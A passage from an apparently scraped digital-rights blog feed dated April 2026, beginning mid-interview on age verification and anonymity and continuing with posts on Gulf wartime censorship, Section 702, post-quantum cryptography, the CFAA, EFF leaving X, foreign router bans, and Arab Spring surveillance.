I realized the same thing is happening again. I was on a call recently with a group of civil society organizations and someone floated the idea of supporting identity verification on social media in the Philippines as a way to counter disinformation. She came from a different understanding of the political economy, but the moment I heard it, I was disappointed. The argument is dangerous and it plays with fire because it assumes that anonymity is the problem. It assumes that the solution is to hand the state and the corporations even more power, more information, more control, and give them even more ability to track and discipline people. I feel like this is the same trend we see with age-gating, because the claim with identity verification in the context of the Philippines, that it can be used responsibly if there are guardrails. That’s gambling with people’s lives. There has never been a single historical precedent where the state doesn't expand monitoring powers when it can once the door is open to surveillance. I don't think any guardrails will ever hold. Civil society groups who entertain the idea of breaking anonymity to solve misinformation are rehearsing a dangerous illusion because anonymity is not a luxury. And it feels like it is being framed that way. Anonymity is a response to the political conditions where speaking freely can cost you your life. It exists because the risks are there and they are not imagined. DG: I do think there are some people who look at age-gating from a good place. Would you say you see age verification mandates as just inevitably being tools of oppression for marginalized young people? JLD: Above everything, it shifts the Overton window toward the broader acceptance of surveillance. In political science, when we say we're shifting the Overton window, we mean the space of political debate in public discourse is being narrowed. And now we are seeing it move towards the same old thing of, ‘if you have nothing to hide, you have nothing to worry about.’ And when you shift the Overton window towards the broader acceptance of surveillance, we're doing something very simple and very dangerous. And it turns intrusive monitoring into a normal routine of everyday life. It starts with policies that redefine surveillance as safety. Then age-gating will be established through technical infrastructure that of course can be repurposed later. Any system capable of verifying age is also capable of verifying identity, tracking behavior, matching accounts to real people, and storing data that can be accessed by literally anyone. These policies teach people to internalize the idea that anonymity is suspicious. I think that is the most dangerous part of it--how that cultural shift is getting more and more powerful, because it moves us, the public, towards believing that only those with nothing to hide deserve rights. Then what comes next after that? Surveillance becomes a default condition for digital participation. If you cannot enter a platform without proving who you are, then surveillance becomes a prerequisite for basic communication. Then, of course, the most powerful shift is the desensitization of younger generations to being monitored. We are raising children in a system where every login requires identity checks, they will grow into adults who assume that constant tracking is normal. Then this is what shifting the Overton window looks like in practice, because once you accept that premise, you have already surrendered the most important ground. The fight is no longer about whether surveillance should exist, but how much of it you're willing to tolerate. And we know the people who pay the price are not men in suits. DG: Then who does pay the price? JLD: It is always the working class children and working class families. The homeless youth who rely on social media to find food, to find a place to shower. The homeless youth who rely on social media to find community and get jobs. Then we have queer young people who are also getting locked out of spaces where they could find community. And we're locking them out of those spaces because it's ‘for their safety.’ DG: So even if there was magic tech that could solve the verification part in a completely privacy protective way, you still can't get around the infringement on the rights of young people. That seems to be the goal of the law. JLD: Yeah, absolutely. Because why do you need to age-gate social media if it's not for control? We always frame things like this as protection under the guise of paternalism. But deep inside, we see how it is a tool to control a young population who are just now getting very politically active. And I feel like--as I'm now a geriatric millennial--people of my age and older generation have betrayed the younger generation for doing this at this precarious time, where there is a genocide happening, where there are countries being bombed. We are in a time of conflicts started by rich men, amid an ecological collapse, and our concern is children being online? Let’s not rob the children of today of their future. Age gating punishes the young for crises they did not create, whilst protecting those truly responsible from accountability. The reality outside of social media will not go away even if kids are shut off from it. We need to confront the truth that the conditions that ruin childhood are not on social media. They are bombs, poverty, divisive politics. They're due to how we’re killing public funding and putting it through private corporations, lining the pockets of billionaires in the name of what? That is the main problem of our society, but we're not addressing that. We're just locking kids out of social media, because it's easier to do that than to address the fact that society needs an overhaul. DG: And I think what we've seen with Australia is a lot of talk about how kids can evade the protections, whether they're using VPNs or somehow faking the ID and so all age-gating is doing is adding friction to the process. And that tends to have highly discriminatory effects also, right? JLD: Friction might be a minor obstacle for a wealthy child with supportive parents, but friction keeps a different child off the internet. A wealthy child might have the technical means to buy a workaround to allow them to have access. There was a story in the news about an influencer family who just moved out of the country because of the age-restricted social media ban. This is the reality—people who have the means to move will move. And those who have no means to move, those who are struggling just to put food on the table—will just stay. This is anti-poor. Age gating is anti-poor. DG: Okay, switching gears just a little bit. Was there any sort of personal experience you've had with freedom of expression that has informed how you think about the issue? Was there any kind of formative experience where you felt censored or witnessed censorship happening to someone else that really informs how you think about it now or made you care about the issue deeply? JLD: I don't think there's one specific personal experience, per se, that has shaped how I feel about freedom and liberty in general. Growing up in the Philippines, you're forced to care, especially if you're in a working-class neighborhood like where I grew up. At an early age you realize how unfair the world is. And at first, you think that it is just unfair that the other children in my classroom families can afford a pencil case and we cannot. It was also very difficult to fit in in the Philippines. I was labeled a troublemaker as a child. And I think some of that is actually still reminiscent of what I am today. I remember my sixth-grade history teacher approached me after reading an essay I wrote about the Philippines. She said that I should tone down my language because it will get me in trouble later in life. And I didn't understand what she meant by that. I didn't listen to her, clearly. But that instinct stayed with me and I think it followed me through life. It followed me here—you know, the idea that you should say it, but not like that. Speak, but don't disrupt. Critique, but don't offend. And I think this is where my relationship with liberty and freedom or, specifically, freedom of expression kind of took place. It was not one defining moment, but it's in a series of small friction, as you called it. Because over time, you realize that the pressure to soften your voice never disappears. And I don't think it ever will. And I chose not to then, and I choose not to now. And there’s a lot of consequences that come with that. I don't think I will be invited to a lot of panels or keynotes. But it's a hill I'm willing to die on. This is also the same pattern we see at a larger scale in the Philippines. You see communities speak out about land or about labor and then suddenly they are surveilled, they're either disappeared or dead. I realized quickly that freedom of expression exists on paper, but in practice it depends on who you are. DG: Do you think there are situations where it might be appropriate for governments, or even companies, to limit freedom of expression? And if the answer is yes, what might those be? JLD: Freedom of speech should always demand a responsibility. It has always existed within structures of power that determine whose speech is protected. So when we ask whether speech should be limited, we have to first ask. limited by whom, and in whose interest? But I don't think the government or corporations can do that. Corporations’ end goal is always profit. And governments have historically used the language of limitation to silence the very people who dare to challenge their authority. I believe in community-based understanding of how we actually could solve this problem, because, in the end, our relationship with our community is the core of our identity. And through those moments of interactions, we can see the freedom of speech is collective. It is always tied to building a society where people can speak truthfully, and dissent is not criminalized. It’s a matter of making sure that we understand that freedom and liberty is not an individual issue, but it’s something that affects the whole community. DG: You’re saying this is more about community norms or our broader social compact. JLD: When I say the community must decide, I am not offering you a utopia. I am offering you a different site of struggle. One that centers the people who have always known, in their bodies, what dehumanizing language does before it becomes dehumanizing violence. We have seen this dynamic in the way hate speech fuels violence back home in the Philippines, against indigenous communities, queer people, Muslims in Mindanao and the urban poor. Because language becomes permission that activates the system of policing and militarization already pointed at the most vulnerable. The main boundaries must be rooted in the politics of liberation, not the politics of control. Speech that punches up, that reveals injustice, that challenges power, that speech must be protected. But speech that punches down, that facilitates state violence, that dehumanizes people, I think that must be confronted, if not challenged or destroyed. We have to stop pretending that those two forms of speech are morally equivalent.  DG: Okay, last question, one that we like to ask everyone. Who's your free speech hero? And why? JLD: This is actually a really tough question for me because I don't actually think I have one, to be honest. I want to push back on the idea of having a single hero. Because, freedom of speech—any freedom or liberty that we have today—has never been secured by one individual alone. It has been fought for by movements. The eight-hour workday, unions, women's suffrage, despite that it was just white women who were first able to vote, and so on and so forth. It was fought for by movements, by working class people, whose names we often forget. Because a lot of movements in history, the public memory of a movement narrows it down to a single figure, often male. Movement starts from the people, because the movement would not be sustained without the drive of the working people who dedicated free, unpaid labor for it to succeed. Because without them, I don't think there would be any movement to speak of. Without them there's no platform from which any of these figures could actually emerge. 

  • War as a Pretext: Gulf States Are Tightening the Screws on Speech—Again
    by Jillian C. York on April 13, 2026 at 3:29 pm

    War does not only reshape borders. It also reshapes what can be seen, said, and remembered.  When governments invoke “misinformation” during wartime, they often mean something simpler: speech they do not control. Since the escalation of conflict between the United States, Israel, Iran, and related spillover attacks in the Gulf, several governments have intensified efforts to silence dissent and restrict the flow of information. Journalism under pressure For journalists, the space to operate—already constrained in much of the Gulf—is narrowing further. Across the region, several countries (including the UAE, Qatar, and Jordan) have restricted access to conflict areas, warned of legal consequences for publishing footage, and drawn red lines around wartime reporting. These measures weaken independent coverage, elevate official narratives, and make it harder for the public to get an accurate account of events on the ground. Reporters Without Borders has documented an intensifying crackdown on journalists across Gulf countries and Jordan, including restrictions on reporting, legal threats, and heightened risks for those who deviate from official narratives. This aligns with the broader warning from the UN that repression of civic space and freedom of expression has significantly deepened across the region during the war. Criminalizing speech, one post at a time For ordinary internet users, the restrictions are just as severe. Since February, hundreds of people have reportedly been arrested across the region for social media activity linked to the war. In many Gulf states, the legal infrastructure enabling this is already well-established: expansive cybercrime and media laws criminalize vaguely defined offenses such as “spreading rumors,” “undermining public order,” or “insulting the state”. In wartime, these provisions become catch-all tools: flexible enough to apply to nearly any form of dissent. In Bahrain, authorities have reportedly cracked down on people who protested or shared footage of the conflict online. The Gulf Centre for Human Rights has reported 168 arrests in the country tied to protests and online expression, with defendants potentially facing serious prison terms if convicted. In the UAE, authorities have arrested nearly 400 people for recording events related to the conflict and for circulating information they described as misleading or fabricated. Police have claimed this material could stir public anxiety and spread rumors, and state-linked reporting has described the crackdown as part of a broader effort to defend the country from digital misinformation. Saudi Arabia has also intensified restrictions, issuing a statement on March 2 banning the sharing of rumors or videos of unknown origin, and issuing a campaign discouraging residents from taking or posting photos. The campaign included a hashtag that reads “photography serves the enemy.” Journalists have been prevented from documenting the aftermath of airstrikes on the country. Kuwait, Qatar, and Jordan have adopted similar restrictions on wartime imagery and reporting. Qatar’s Interior Ministry has arrested more than 300 people for filming, circulating, or publishing what the ministry deemed to be misleading information. Taken together, these measures show how quickly wartime speech is being folded into existing legal systems designed to punish dissent. The regional playbook What’s striking is how consistent these measures are across different countries. As we recently wrote, governments across the broader region have enacted sweeping cybercrime and media laws over the past fifteen years, which they are now putting to use. Across different countries, the same tools are being used: existing laws, fresh bans on sharing wartime imagery, and tighter restrictions on journalists and reporting. The vocabulary changes slightly from place to place, but the logic is the same: national security, public order, rumors, and social stability are justifications for control. This is not just a series of isolated incidents. It is a regional playbook for silencing critics and narrowing the public record. Gulf states have long relied on censorship and surveillance; the war has simply made those methods easier to justify and harder to challenge. From “digital hopes” to digital control As we’ve documented in our ongoing blog series, digital platforms were once seen—at least in part—as spaces that could expand public discourse in the region. But as we’ve also argued, those early “digital hopes” have given way to systems of regulation and control.  The current crackdown is a continuation of that trajectory, not a temporary departure from it. States are not just reacting to the war; they are leveraging it to consolidate long-standing ambitions to dominate the digital public sphere. It may be tempting to see these measures as temporary, but emergency powers—like the one enacted in Egypt following the 1981 assassination of Anwar Sadat that lasted for more than three decades—have a way of sticking around. Legal precedents that are set during wartime often become normalized—or reinvoked during times of crisis, as occurred in 2015, when France brought back a 1955 law related to the Algerian War of Independence amidst the Paris attacks. And the stakes are high. As we’ve seen in Syria and Ukraine, regulations and platform policies can cause wartime human rights documentation to disappear. When journalists are constrained and eyewitness footage is criminalized, accountability is weakened. And when arrests become widespread, people learn to self-censor. Protecting freedom of expression in times of conflict is a requirement for accountability, not a concession to disorder. When people can document, report, and share information freely, it becomes harder for abuses to be hidden behind official narratives. Even in wartime, the public interest is best served by defending the space to tell the truth, not by silencing speech.

  • Trump Torches MAGA — Blasts His Biggest (Now Former) Supporters
    by Daniel McAdams on April 10, 2026 at 4:36 pm

    President Trump has shown a curious characteristic of turning on those who want to hold him to account. Right at the beginning, we had the falling out with Elon Musk over the Big Beautiful Bill. Then, to Trump voters who wanted accountability on the Epstein Files, the president wrote: “I don’t want their support anymore.” The post Trump Torches MAGA — Blasts His Biggest (Now Former) Supporters appeared first on LewRockwell.

  • We Need You: Our Privacy Cannot Afford a Clean Extension of Section 702
    by Matthew Guariglia on April 10, 2026 at 1:50 pm

    We go through this every couple of years: Section 702 of the Foreign Intelligence Surveillance Act (FISA), which of Americans’ communications with foreign persons overseas is up for renewal. As always, Congress can reauthorize it with or without changes, or just let it expire. We know, we know, it’s a pain to have to do this every few years–but it gives us a chance to lift the hood of this behemoth tool of government surveillance and tinker with how it works. That’s why it’s so important right now to urge your Member of Congress not to pass any bill that reauthorizes Section 702 without substantial reforms.    Take action TELL congress: 702 Needs Reform Section 702 is rife with problems, loopholes, and compliance issues that need fixing. The National Security Agency (NSA) collects full conversations being conducted by surveillance targets overseas and stores them, allowing the Federal Bureau of Investigation (FBI) to operate in a “finders keepers” mode of surveillance—they reason that it's already collected, so why can’t they look at those conversations? There, the FBI can query and even read the U.S. side of that communication without a warrant. The problem is, people who have been spied on by this program won’t even know and have very few ways of finding out. EFF and other civil liberties advocates have been trying for years to know when data collected through Section 702 is used as evidence against them.   There’s simply no excuse for any Member of Congress to support a "clean" reauthorization of Section 702. Anyone who votes to do so does not take your privacy seriously. Full stop.   The intelligence community and its defenders in Congress, as always, seem more interested in defending their rights to read your private communications than in protecting your right to privacy. It’s not really a compromise between safety and privacy if it's always your privacy that gets sacrificed. Now, we’re drawing a line in the sand: Congress cannot pass a clean extension.   Use this EFF tool to write to your Member of Congress and tell them not to pass a clean reauthorization of Section 702.   Take action TELL congress: 702 Needs Reform

  • Yikes, Encryption’s Y2K Moment is Coming Years Early
    by Erica Portnoy on April 9, 2026 at 9:32 pm

    Google moved up its estimated deadline for quantum preparedness in cryptography to 2029—only 33 months from now. That’s earlier than previous deadlines, and they proposed the new post-quantum migration deadline because of two new papers that comprise a big jump in the state of the technology. It’s ahead of schedule, but not altogether unexpected. Cryptographers and engineers have been working on this for years, and as the deadline gets closer, it’s not surprising to see more precise timeline estimates come up. The preparation for the Y2K bug is not a perfect analogy. Like Y2K, if systems are not updated in time, anyone with a powerful enough quantum computer will be able to more easily insert malware into the core systems of a computer and fake authentication to allow impersonation merely by observing network traffic. These are the threats whose mitigation timelines have been moved up. But unlike Y2K, there’s a second sort of attack that we already need to be prepared for: quantum computers will be able to decrypt years of captured messages sent over encrypted messaging platforms shared any time before those platforms updated to quantum-proof encryption. That type of attack has been the main focus of engineering efforts so far and mitigation is well on its way, since anything before the upgrade might eventually be compromised. Fortunately, not all cryptography is broken by quantum computers. Notably, symmetric encryption is quantum resistant. That means that if you have disk encryption turned on, you shouldn’t have to worry about quantum computers breaking into your phone, as long as your system’s keys are long enough. The problem is how you get the keys to do that encryption, and how you authenticate software on your device and in the cloud. Engineers: Time to Lock In For those whose work touches on any sort of cryptographic deployment, you’re hopefully already working on the post-quantum transition. If not, you really should be; there are quite a few relevant posts and updates with more information about what this news means for you. Your key agreement systems should be upgraded soon if they’re not already because of store-now-decrypt-later attacks. Now it’s time to prepare for authentication attacks on forged signatures as well. In some cases, you may need to wait on others to finish their work first. If you’re using NGINX to host websites on Ubuntu, for example, the security settings you need to upgrade key agreement were just released in version 26.04. Updates are rolling out, so keep checking in and upgrade your systems as soon as you’re able to. Users: Stay Updated, Check on Your Chats But if you’re not in any position to be updating software or hardware, there may be some additional steps you can take to make sure you're as protected as possible. You’ll want to get the latest post-quantum protections as soon as they're available, so if you don't already have a habit of applying software updates in a timely manner, now’s a good time to start. If you want to know if the website you’re using or the encrypted messaging app you’re chatting over will leak its data in a few years to anyone storing traffic now, you can search for its name with the word "quantum." The engineers are usually pretty proud of their work and have announced their post-quantum support (like what we’ve seen from Signal and iMessage). If you can’t find that information, you may want to have extra consideration for what you say over the internet, or switch the tools you're using. Those are the big areas to worry about now, before quantum computers are actually here, because they could result in the mass leakage of old messages. The new deadline means that some technologies are simply not going to make it in time and will have to be left by the wayside, like trusted execution environments (TEEs), due to the slower speed of hardware deployments. TEEs are how companies do private processing on user data in the cloud, and they’re particularly relevant to AI offerings.  Even now, though they offer more protection than processing data in the clear, TEEs are not as secure as homomorphic encryption or doing the processing on device. Post-quantum, the security level gets much closer to computation on cleartext, and even with strong user controls, that makes it way too easy to accidentally backdoor your own encrypted chats. If you’re worried about the contents of messages in an encrypted chat being exposed, you’ll probably want to completely avoid using AI features that might leak that content, such as summarization of recent chat history and notifications, and reply composition assistance.  How’s the Transition Going So Far? The work to update the world to post-quantum is well on its way. NIST finalized the standards for post-quantum cryptographic algorithms back in 2024. The larger platforms, websites, and hosting providers have already updated their algorithms, so even now, you’re probably already using post-quantum algorithms to access some of the internet. Measurements vary pretty widely, but up to about 4 in 10 websites currently support a post-quantum key exchange. There’s still some work to be done in figuring out how to make the needed changes—for example, the way you find out a website’s private key to make HTTPS possible is being reworked to make room for larger signatures. Some technologies are just coming to market, like the post-quantum root of trust available now in some Chromebooks. In practice, this means that as you think about replacing your current devices in the next few years, you may want to check if you’re picking up hardware that has post-quantum support, if those specific protections are required for your threat model. For the areas that still need updating, how much can we expect to actually get ready by the new deadline? It’s likely that not every cryptographically-capable device and deployment will be ready in time, and hardware with hard-coded certificates will probably be the last to update. We saw that happen when SHA-1 was deprecated; Point of Sale systems in particular were late adopters. While governments and large companies with quantum computers may not be interested in stealing money from cash registers, they will be interested in accessing secrets about people’s private lives. That’s why it’s so important that everyone does their part to upgrade, to protect the details of private communications and browsing.  And there’s a good chance that older devices that won’t receive quantum-resistant updates were probably vulnerable to some other attack already. Quantum computation is just one type of attack on cryptography that’s notable for the scale of migration required, and how every public-key cryptosystem and authentication scheme has to do the work to prepare. That’s not a difference in kind, it’s a difference in scale, and some systems will inevitably be left behind. Quantum preparedness hits different industries and services in different ways, but services that handle communications and financial information are particularly susceptible to risk, and need to act quickly to protect the privacy and security of billions of people.

  • Comparison Shopping Is Not a (Computer) Crime
    by Corynne McSherry on April 9, 2026 at 5:20 pm

    As long as people have had more than one purchasing option, they’ve been comparing those options and looking for bargains. Online shoppers are no exception; in fact, one of the potential benefits of the internet is that it expands our options for everything from car rentals to airline tickets to dish soap. New AI tools can make the process even easier. These tools could provide some welcome relief for consumers facing sky-high prices that many cannot afford. Unfortunately, Amazon is trying to block these helpful new tools, which can steer shoppers towards competitors. Taking a page from Facebook and RyanAir, they are trying to use computer crime laws to do it.  Amazon’s target is Perplexity, which makes an AI-enabled web browser, called Comet, that allows users to browse the web as they normally would, but can also perform certain actions on the user’s behalf. For example, a user could ask Comet to find the best price on a 24-pack of toilet paper, and if satisfied with the results, have the browser order it. Amazon claims that Perplexity violated the Computer Fraud and Abuse Act (CFAA) by building a tool that helps users access information on Amazon and engage with the site. Unfortunately, a federal district court agreed. The court’s fundamental mistake: relying on the Ninth Circuit’s misguided decision in Facebook v Power Ventures, rather than the court’s much better and more applicable reasoning in hiQ Labs. Perplexity has appealed to the Ninth Circuit. As we explain in an amicus brief filed in support, the district court’s mistake, if affirmed, could lead to myriad unintended consequences. Overbroad readings of the CFAA have undermined research, security, competition, and innovation. For years, we’ve worked to limit its scope to Congress’s original intention: actual hacking that bypasses computer security. It should have nothing to do with Amazon’s claims here, not least because most of Amazon’s website is publicly available. The court’s approach would be especially dangerous for journalists and academic researchers. Researchers often create a variety of testing accounts. For example, if they’re researching how a service displays housing offers, they may create separate accounts associated with different race, gender, or language settings. These sorts of techniques may be adversarial to the company, but they shouldn’t be illegal. But according to the court’s opinion, if a company disagrees with this sort of research, it can’t just ban the researchers from using the site; it can render that research criminal by just sending a letter notifying the researcher that they’re not authorized to use the service in this way. A broad reading of CFAA in this case would also undermine competition by enabling companies to limit data scraping, effectively cutting off one of the ways websites offer tools to compare prices and features. The Ninth Circuit should follow Van Buren’s lead and interpret the CFAA narrowly, as Congress intended. Website owners do not need new shields against independent accountability. Related Cases: Facebook v. Power Ventures

  • EFF is Leaving X
    by Kenyatta Thomas on April 9, 2026 at 4:25 pm

    After almost twenty years on the platform, EFF is logging off of X. This isn’t a decision we made lightly, but it might be overdue. The math hasn’t worked out for a while now. The Numbers Aren’t Working Out We posted to Twitter (now known as X) five to ten times a day in 2018. Those tweets garnered somewhere between 50 and 100 million impressions per month. By 2024, our 2,500 X posts generated around 2 million impressions each month. Last year, our 1,500 posts earned roughly 13 million impressions for the entire year. To put it bluntly, an X post today receives less than 3% of the views a single tweet delivered seven years ago.  We Expected More When Elon Musk acquired Twitter in October 2022, EFF was clear about what needed fixing.  We called for:  Transparent content moderation: Publicly shared policies, clear appeals processes, and renewed commitment to the Santa Clara Principles Real security improvements: Including genuine end-to-end encryption for direct messages Greater user control: Giving users and third-party developers the means to control the user experience through filters and interoperability. Twitter was never a utopia. We've criticized the platform for about as long as it’s been around. Still, Twitter did deserve recognition from time to time for vociferously fighting for its users’ rights. That changed. Musk fired the entire human rights team and laid off staffers in countries where the company previously fought off censorship demands from repressive regimes. Many users left. Today we're joining them.  "But You're Still on Facebook and TikTok?"  Yes. And we understand why that looks contradictory. Let us explain.  EFF exists to protect people’s digital rights. Not just the people who already value our work, have opted out of surveillance, or have already migrated to the fediverse. The people who need us most are often the ones most embedded in the walled gardens of the mainstream platforms and subjected to their corporate surveillance.  Young people, people of color, queer folks, activists, and organizers use Instagram, TikTok, and Facebook every day. These platforms host mutual aid networks and serve as hubs for political organizing, cultural expression, and community care. Just deleting the apps isn't always a realistic or accessible option, and neither is pushing every user to the fediverse when there are circumstances like: You own a small business that depends on Instagram for customers. Your abortion fund uses TikTok to spread crucial information. You're isolated and rely on online spaces to connect with your community. Our presence on Facebook, Instagram, YouTube, and TikTok is not an endorsement. We've spent years exposing how these platforms suppress marginalized voices, enable invasive behavioral advertising, and flag posts about abortion as dangerous. We’ve also taken action in court, in legislatures, and through direct engagement with their staff to push them to change poor policies and practices. We stay because the people on those platforms deserve access to information, too. We stay because some of our most-read posts are the ones criticizing the very platform we're posting on. We stay because the fewer steps between you and the resources you need to protect yourself, the better.  We'll Keep Fighting. Just Not on X When you go online, your rights should go with you. X is no longer where the fight is happening. The platform Musk took over was imperfect but impactful. What exists today is something else: diminished, and increasingly de minimis. EFF takes on big fights, and we win. We do that by putting our time, skills, and our members’ support where they will effect the most change. Right now, that means Bluesky, Mastodon, LinkedIn, Instagram, TikTok, Facebook, YouTube, and eff.org. We hope you follow us there and keep supporting the work we do. Our work protecting digital rights is needed more than ever before, and we’re here to help you take back control.

  • Banning New Foreign Routers Mistargets Products to Fix Real Problem
    by Bill Budington on April 8, 2026 at 7:24 pm

    On March 23, the FCC issued an update to their Covered List, a list of equipment banned from obtaining regulatory approval necessary for U.S. sale (and thus effectively a ban on sale of new devices), to include all new routers produced in foreign countries unless they are specifically given an exception by the Department of Defense (DoD) or DHS. The Commission cited “security gaps in foreign-made routers” leading to widespread cyberattacks as justification for the ban, mentioning the high-profile attacks by Chinese advanced persistent threat actors Volt, Flax, and Salt Typhoon. Although the stated intention is to stem the very real threat of domestic residential routers being commandeered to initiate attacks and act as residential proxies, this sweeping move serves as a blunt instrument that will impact many harmless products. In addition to being far too broad, it won’t even affect many vulnerable devices that are most active in these types of attacks: IoT and connected smart home devices. Previously, the FCC had changed the Covered List to ban hardware by specific vendors, such as telecom equipment produced by companies Huawei and Hytera in 2021. This new blanket ban, in contrast, affects the importation and sale of almost all new consumer routers. It does not affect consumer routers produced in the United States, like Starlink in Texas. While some of the affected routers will be vulnerable to compromises that hijack the devices and use them for cybercrime and attacks, this ban does not distinguish between companies with a track-record of producing vulnerable products and those without. As a result, instead of incentivizing security-minded production, this will only limit the options consumers have to US-based manufacturers not affected by the ban—even those that lack stellar security reputations themselves. While the sale of vulnerable routers in the U.S. will not stop, the announcement quoted an Executive Branch determination that foreign produced routers introduce “a supply chain vulnerability that could disrupt the U.S. economy, critical infrastructure, and national defense.” Yet this move does nothing to address the growing number of connected devices involved in the attacks this ban aims to address. As we have previously pointed out, supply chain attacks have resulted in no-name Android TV boxes preloaded with malware, sold by retail giants like Amazon, fuelling the massive Kimwolf and BADBOX 2 fraud and residential proxy botnets. Banning the specific models and manufacturers we know produce dangerous devices putting its purchasers at risk, rather than issuing blanket bans punishing reputable brands that do better, should be the priority. With the FCCs top commissioner appointed by the President, this ban comes as other parts of the administration impose tariffs and issue dozens of trade-related executive orders aimed at foreign goods. A few larger companies with pockets deep enough to invest in manufacturing plants within the U.S. may see this as an opportune moment, while others not as well poised to begin U.S. operations may attempt to curry enough favor to be added to the DoD or DHS exception lists. At best, this will result in the immediate effect of an ill-targeted policy that does little to improve domestic cybersecurity posture. At worst, it entrenches existing players and deepens problematic quid-pro-quo arrangements. American consumers deserve better. They deserve the assurance that the devices they use, whether routers or other connected smart home devices, are built to withstand attacks that put themselves and others at risk, no matter where they are manufactured. For this, a nuanced, careful consideration of products (such as was part of the FCC’s 2023-proposed U.S. Cyber Trust Mark) is necessary, rather than blanket bans.

  • Another Court Rules Copyright Can’t Stop People From Reading and Speaking the Law
    by Mitch Stoltz on April 8, 2026 at 6:13 pm

    Another court has ruled that copyright can’t be used to keep our laws behind a paywall. The U.S. Court of Appeals for the Third Circuit upheld a lower court’s ruling that it is fair use to copy and disseminate building codes that have been incorporated into federal and state law, even though those codes are developed by private parties who claim copyright in them. The court followed the suggestions EFF and others presented in an amicus brief, and joined a growing list of courts that have placed public access to the law over private copyright holders’ desire for control. UpCodes created a database of building codes—like the National Electrical Code—that includes codes incorporated by reference into law. ASTM, a private organization that coordinated the development of some of those codes, insists that it retains copyright in them even after they have been adopted into law, and therefore has the right to control how the public accesses and shares them. Fortunately, neither the Constitution nor the Copyright Act support that theory. Faced with similar claims, some courts, including the Fifth Circuit Court of Appeals, have held that the codes lose copyright protection when they are incorporated into law. Others, like the D.C. Circuit Court of Appeals in a case EFF defended on behalf of Public.Resource.Org, have held that, whether or not the legal status of the standards changes once they are incorporated into law, making them fully accessible and usable online is a lawful fair use. In this case, the Third Circuit found that UpCodes’s copying of the codes was a fair use, in a decision closely following the D.C. Circuit’s reasoning. Fair use turns on four factors listed in the Copyright Act, and the court found that all four favored UpCodes to some degree. On the first factor, the purpose and character of the use, the court found that UpCodes’s use was “transformative” because it had a separate and distinct purpose from ASTM—informing people about the law, rather than just best practices in the building industry. No matter that UpCodes was copying and disseminating entire safety codes verbatim—using the codes for a different purpose was enough. And UpCodes being a commercial venture didn’t change the outcome either, because UpCodes wasn’t charging for access to the codes. On the second factor, the nature of the copyrighted work, the Third Circuit joined other appeals courts in finding that laws are facts, and stand at “the periphery of copyright’s core protection.” And this included codes that were “indirectly” incorporated—meaning that they were incorporated into other codes that were themselves incorporated into law. The third factor looks at the amount and substantiality of the material used. The court said that UpCodes could not have accomplished its purpose—providing access to the current binding laws governing building construction—without copying entire codes, so the copying was justified. Importantly, the court noted that UpCodes was justified in copying optional parts of the codes as well as “mandatory” sections because both help people understand what the law is. Finally, the fourth factor looks at potential harm to the market for the original work, balanced against the public interest in allowing the challenged use. The court rejected an argument frequently raised by copyright holders—that harm can be assumed any time materials are posted to the internet for all to access. Instead, the court held that when a use is transformative, a rightsholder has to bring evidence of harm, and that harm will be balanced against the public benefit. Because “enhanced public access to the law is a clear and significant public benefit,” and ASTM hadn’t shown significant evidence that UpCodes had meaningfully reduced ASTM’s revenues, the fourth factor was at least neutral. It didn’t matter to the court that ASTM offered to provide copies of legally binding standards to the public on request, because “the mere possibility of obtaining a free technical standard does not nullify the public benefits associated with enhanced access to law.” This is a good result that will expand the public’s access to the laws that bind us—something that’s more important than ever given recent assaults on the rule of law. In the future, we hope that courts will recognize that codes and standards lose copyright when they are incorporated into law, so that people don’t have to spend years and legal fees litigating fair use just to exercise their rights.

  • 👁 Selling Mass Surveillance | EFFector 38.7
    by Christian Romero on April 8, 2026 at 4:24 pm

    Time and time again, we've seen police surveillance suffer from 'mission creep'—technology sold as a way to prevent heinous crimes ends up enforcing traffic violations, tracking protestors, and more. In our latest EFFector newsletter, we're diving into this troubling pattern and sharing all the latest in the fight for privacy and free speech online. JOIN OUR NEWSLETTER For over 35 years, EFFector has been your guide to understanding the intersection of technology, civil liberties, and the law. This week's issue covers the urgent need to reform NSA spying; a victory for internet access in the Supreme Court; and how license plate readers are normalizing mass surveillance. Prefer to listen in? EFFector is now available on all major podcast platforms. This time, we're chatting with EFF Privacy Litigation Director Adam Schwartz about some of the recent technologies we've seen suffer from "mission creep." And don't miss the EFFector news quiz! You can find the episode and subscribe on your podcast platform of choice:  %3Ciframe%20height%3D%22200px%22%20width%3D%22100%25%22%20frameborder%3D%22no%22%20scrolling%3D%22no%22%20seamless%3D%22%22%20src%3D%22https%3A%2F%2Fplayer.simplecast.com%2F2ff7f80b-1fbe-4013-97b6-43873a6785ac%3Fdark%3Dfalse%22%20allow%3D%22autoplay%22%3E%3C%2Fiframe%3E Privacy info. This embed will serve content from simplecast.com     Want to help us push back against mass surveillance? Sign up for EFF's EFFector newsletter for updates, ways to take action, and new merch drops. You can also fuel the fight for privacy and free speech online when you support EFF today!

  • Digital Hopes, Real Power: How the Arab Spring Fueled a Global Surveillance Boom
    by Sarah Hamid on April 8, 2026 at 8:22 am

    This is the third installment of a blog series reflecting on the global digital legacy of the 2011 Arab uprisings. You can read the first post here, and the second here. When people recall the 2011 uprisings across the Middle East and North Africa (MENA), they often picture crowded squares, raised phones, and the feeling that the internet had finally shifted the balance of power toward ordinary people. But the past decade and a half is also a story about how governments, companies, and platforms turned those same tools into the backbone of a powerful state surveillance apparatus. For activists, journalists, everyday users, that means now living with a constant threat. The phone in your pocket, the platforms you organize on, and the systems you rely on for safety and connection can be weaponized at the flip of a switch. A global surveillance industry has treated repression by many MENA governments as a growth opportunity, and the tactics refined there now shape digital authoritarianism worldwide. This essay traces how that shift unfolded: security agencies upgraded older systems of repression with new surveillance tools and permanent monitoring infrastructure; cybercrime laws and mercenary spyware markets turned digital control into standard operating procedure; and biometrics, facial recognition, and ‘smart city’ projects laid the groundwork for AI‑driven surveillance that now shapes protests, borders, and everyday life far beyond the region.  Remembering the Arab Spring means seeing the events of 2011 as both a remarkable moment of movement history when people leveraged networked tools in their fight for freedom and the beginning of a long, grinding effort to turn those same tools into mechanisms of state control. Old‑School Repression, New‑School Tools Long before Facebook and Twitter, regimes in countries like Egypt and Syria already knew how to crush dissent. They leaned on informant networks, physical surveillance, and wiretaps, backed by emergency laws that let security agencies monitor and detain critics with almost no restraint. Research on the use of surveillance technology in MENA shows that, even before the Arab Spring, states were layering early digital tools like internet monitoring, deep packet inspection, and interception centers on top of that older machinery of control. At the same time, connectivity was racing ahead. Cheap smartphones and social media suddenly let people share information at scale, coordinate protests, and broadcast abuses in real time. In 2011, EFF described both the excitement around “Facebook revolutions” and the early signs that governments were scrambling to upgrade their capacity to watch and disorganize popular dissent. After the 